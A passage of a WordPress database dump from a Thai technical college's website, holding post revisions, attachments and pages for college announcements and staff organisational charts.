'closed', '', '2048-revision-v1', '', '', '2018-05-02 09:08:14', '2018-05-02 02:08:14', '', 2048, 'http://www.technicrayong.ac.th/2048-revision-v1/', 0, 'revision', '', 0),
(2051, 3, '2018-05-02 09:08:23', '2018-05-02 02:08:23', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%96%E0%B8%B6%E0%B8%87%E0%B9%80%E0%B8%81%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน-นักศึกษา พ้นสภาพเนื่องจากผลการเรียนเฉลี่ยไม่ถึงเกณฑ์ ภาคเรียนที่ 2 ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '2048-autosave-v1', '', '', '2018-05-02 09:08:23', '2018-05-02 02:08:23', '', 2048, 'http://www.technicrayong.ac.th/2048-autosave-v1/', 0, 'revision', '', 0),
(2052, 1, '2018-05-02 09:14:10', '2018-05-02 02:14:10', '', 'Nuttharee-Academic Works', '', 'inherit', 'closed', 'closed', '', 'nuttharee-academic-works', '', '', '2018-05-02 09:14:10', '2018-05-02 02:14:10', '', 2046, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/Nuttharee-Academic-Works.pdf', 0, 'attachment', 'application/pdf', 0),
(2053, 1, '2018-05-02 09:17:21', '2018-05-02 02:17:21', '[[\"\\u0e19\\u0e32\\u0e07\\u0e13\\u0e31\\u0e10\\u0e18\\u0e32\\u0e23\\u0e35\\u0e22\\u0e4c \\u0e2a\\u0e34\\u0e23\\u0e34\\u0e01\\u0e38\\u0e25\\u0e1b\\u0e31\\u0e0d\\u0e0d\\u0e32\\u0e1e\\u0e23\",\"\\u0e23\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e48\\u0e32\\u0e22\\u0e27\\u0e34\\u0e0a\\u0e32\\u0e01\\u0e32\\u0e23\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/wp-content\\/uploads\\/2018\\/05\\/Nuttharee-Academic-Works.pdf\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Academic Works for Manager', '', 'inherit', 'closed', 'closed', '', '2047-revision-v1', '', '', '2018-05-02 09:17:21', '2018-05-02 02:17:21', '', 2047, 'http://www.technicrayong.ac.th/2047-revision-v1/', 0, 'revision', '', 0),
(2054, 1, '2018-05-02 09:19:15', '2018-05-02 02:19:15', 'เผยแพร่ผลงานวิชาการ\r\n\r\n[table id=1 /]\r\n\r\n ', 'ผลงานวิชาการของผู้บริหาร', '', 'inherit', 'closed', 'closed', '', '2046-revision-v1', '', '', '2018-05-02 09:19:15', '2018-05-02 02:19:15', '', 2046, 'http://www.technicrayong.ac.th/2046-revision-v1/', 0, 'revision', '', 0),
(2057, 1, '2018-05-02 09:21:17', '2018-05-02 02:21:17', '<a href=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n<p style=\"text-align: center;\">[table id=1 /]</p>\r\n ', 'ผลงานวิชาการของผู้บริหาร', '', 'inherit', 'closed', 'closed', '', '2046-revision-v1', '', '', '2018-05-02 09:21:17', '2018-05-02 02:21:17', '', 2046, 'http://www.technicrayong.ac.th/2046-revision-v1/', 0, 'revision', '', 0),
(2060, 3, '2018-05-02 13:22:05', '2018-05-02 06:22:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577625345946991%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง เข้าร่วมต้อนรับคณะศึกษาดูงานจากวิทยาลัยการอาชีพจอมทอง เข้าศึกษาดูงานด้านการจัดการเรียน ในวันพุธที่ 2 พฤษภาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%80%e0%b8%82-2', '', '', '2018-05-02 13:22:05', '2018-05-02 06:22:05', '', 0, 'http://www.technicrayong.ac.th/?p=2060', 427, 'post', '', 0),
(2061, 3, '2018-05-02 13:21:52', '2018-05-02 06:21:52', '', '31698759_577622652613927_6823009321580756992_o', '', 'inherit', 'closed', 'closed', '', '31698759_577622652613927_6823009321580756992_o', '', '', '2018-05-02 13:21:52', '2018-05-02 06:21:52', '', 2060, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31698759_577622652613927_6823009321580756992_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2062, 3, '2018-05-02 13:22:05', '2018-05-02 06:22:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577625345946991%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง เข้าร่วมต้อนรับคณะศึกษาดูงานจากวิทยาลัยการอาชีพจอมทอง เข้าศึกษาดูงานด้านการจัดการเรียน ในวันพุธที่ 2 พฤษภาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '2060-revision-v1', '', '', '2018-05-02 13:22:05', '2018-05-02 06:22:05', '', 2060, 'http://www.technicrayong.ac.th/2060-revision-v1/', 0, 'revision', '', 0),
(2063, 3, '2018-05-02 13:22:16', '2018-05-02 06:22:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577625345946991%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง เข้าร่วมต้อนรับคณะศึกษาดูงานจากวิทยาลัยการอาชีพจอมทอง เข้าศึกษาดูงานด้านการจัดการเรียน ในวันพุธที่ 2 พฤษภาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '2060-autosave-v1', '', '', '2018-05-02 13:22:16', '2018-05-02 06:22:16', '', 2060, 'http://www.technicrayong.ac.th/2060-autosave-v1/', 0, 'revision', '', 0),
(2064, 3, '2018-05-02 13:52:44', '2018-05-02 06:52:44', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-05-02 13:52:44', '2018-05-02 06:52:44', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(2067, 3, '2018-05-02 14:02:15', '2018-05-02 07:02:15', '', '2-5-2561 13-59-36', '', 'inherit', 'closed', 'closed', '', '2-5-2561-13-59-36-3', '', '', '2018-05-02 14:03:28', '2018-05-02 07:03:28', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg', 0, 'attachment', 'image/jpeg', 0),
(2068, 3, '2018-05-02 14:05:00', '2018-05-02 07:05:00', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1606 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-18-28.jpg\" alt=\"\" width=\"197\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1607 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-23-48.jpg\" alt=\"\" width=\"729\" height=\"625\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1615 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-35-56.jpg\" alt=\"\" width=\"495\" height=\"326\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-05-02 14:05:00', '2018-05-02 07:05:00', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(2069, 3, '2018-05-02 14:07:34', '2018-05-02 07:07:34', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-revision-v1', '', '', '2018-05-02 14:07:34', '2018-05-02 07:07:34', '', 1512, 'http://www.technicrayong.ac.th/1512-revision-v1/', 0, 'revision', '', 0),
(2070, 3, '2018-05-02 15:29:47', '2018-05-02 08:29:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81', '', '', '2018-05-02 15:29:47', '2018-05-02 08:29:47', '', 0, 'http://www.technicrayong.ac.th/?p=2070', 426, 'post', '', 0),
(2071, 3, '2018-05-02 15:29:24', '2018-05-02 08:29:24', '', 'ประกาศผลการสอบครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2', '', '', '2018-05-02 15:29:24', '2018-05-02 08:29:24', '', 2070, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศผลการสอบครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(2072, 3, '2018-05-02 15:29:47', '2018-05-02 08:29:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '2070-revision-v1', '', '', '2018-05-02 15:29:47', '2018-05-02 08:29:47', '', 2070, 'http://www.technicrayong.ac.th/2070-revision-v1/', 0, 'revision', '', 0),
(2074, 3, '2018-05-02 15:57:56', '2018-05-02 08:57:56', '<a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2/1-18/\"><img class=\"alignnone size-full wp-image-11896\" src=\"/wp-content/uploads/2021/06/1-6.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2/2-13/\"><img class=\"alignnone size-full wp-image-11897\" src=\"/wp-content/uploads/2021/06/2-4.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2/3-9/\"><img class=\"alignnone size-full wp-image-11898\" src=\"/wp-content/uploads/2021/06/3-2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ช่างไฟฟ้า', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2', '', '', '2021-06-30 15:09:31', '2021-06-30 08:09:31', '', 0, 'http://www.technicrayong.ac.th/?page_id=2074', 0, 'page', '', 0),
(2075, 3, '2018-05-02 15:56:53', '2018-05-02 08:56:53', '', '2-5-2561 15-57-55', '', 'inherit', 'closed', 'closed', '', '2-5-2561-15-57-55', '', '', '2018-05-02 15:56:53', '2018-05-02 08:56:53', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-15-57-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(2076, 3, '2018-05-02 15:57:00', '2018-05-02 08:57:00', '', '2-5-2561 15-58-24', '', 'inherit', 'closed', 'closed', '', '2-5-2561-15-58-24', '', '', '2018-05-02 15:57:00', '2018-05-02 08:57:00', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-15-58-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(2077, 3, '2018-05-02 15:57:07', '2018-05-02 08:57:07', '', '2-5-2561 15-55-21', '', 'inherit', 'closed', 'closed', '', '2-5-2561-15-55-21', '', '', '2018-05-02 15:57:07', '2018-05-02 08:57:07', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-15-55-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(2078, 3, '2018-05-02 15:57:56', '2018-05-02 08:57:56', '<img class=\"aligncenter wp-image-2075 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-57-55.jpg\" alt=\"\" width=\"196\" height=\"245\" />\r\n\r\n<img class=\"aligncenter wp-image-2076\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-58-24.jpg\" alt=\"\" width=\"372\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-2077 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-55-21.jpg\" alt=\"\" width=\"893\" height=\"646\" />', 'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-05-02 15:57:56', '2018-05-02 08:57:56', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(2080, 3, '2018-05-02 16:31:59', '2018-05-02 09:31:59', '', '2-5-2561 16-33-38', '', 'inherit', 'closed', 'closed', '', '2-5-2561-16-33-38', '', '', '2018-05-02 16:31:59', '2018-05-02 09:31:59', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-16-33-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(2081, 3, '2018-05-02 16:32:32', '2018-05-02 09:32:32', '<img class=\"aligncenter wp-image-2075 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-57-55.jpg\" alt=\"\" width=\"196\" height=\"245\" />\r\n\r\n<img class=\"aligncenter wp-image-2076\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-58-24.jpg\" alt=\"\" width=\"372\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-2077 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-55-21.jpg\" alt=\"\" width=\"893\" height=\"646\" />\r\n\r\n<img class=\"aligncenter wp-image-2080 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-16-33-38.jpg\" alt=\"\" width=\"880\" height=\"643\" />\r\n\r\n ', 'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-05-02 16:32:32', '2018-05-02 09:32:32', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(2083, 3, '2018-05-02 16:35:07', '2018-05-02 09:35:07', '<img class=\"aligncenter wp-image-2075 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-57-55.jpg\" alt=\"\" width=\"196\" height=\"245\" />\r\n\r\n<img class=\"aligncenter wp-image-2076\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-58-24.jpg\" alt=\"\" width=\"372\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-2077 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-55-21.jpg\" alt=\"\" width=\"893\" height=\"646\" />\r\n\r\n<img class=\"aligncenter wp-image-2080 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-16-33-38.jpg\" alt=\"\" width=\"880\" height=\"643\" />\r\n\r\n<img class=\"aligncenter wp-image-2082 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-16-36-26.jpg\" alt=\"\" width=\"905\" height=\"642\" />', 'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-05-02 16:35:07', '2018-05-02 09:35:07', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(2084, 3, '2018-05-02 16:37:30', '2018-05-02 09:37:30', '', '2-5-2561 16-36-26', '', 'inherit', 'closed', 'closed', '', '2-5-2561-16-36-26', '', '', '2018-05-02 16:37:30', '2018-05-02 09:37:30', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/2-5-2561-16-36-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(2085, 3, '2018-05-02 16:38:02', '2018-05-02 09:38:02', '<img class=\"aligncenter wp-image-2075 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-57-55.jpg\" alt=\"\" width=\"196\" height=\"245\" />\r\n\r\n<img class=\"aligncenter wp-image-2076\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-58-24.jpg\" alt=\"\" width=\"372\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-2077 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-15-55-21.jpg\" alt=\"\" width=\"893\" height=\"646\" />\r\n\r\n<img class=\"aligncenter wp-image-2080 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-16-33-38.jpg\" alt=\"\" width=\"880\" height=\"643\" />\r\n\r\n<img class=\"aligncenter wp-image-2084\" src=\"/wp-content/uploads/2018/05/2-5-2561-16-36-26.jpg\" alt=\"\" width=\"913\" height=\"643\" />', 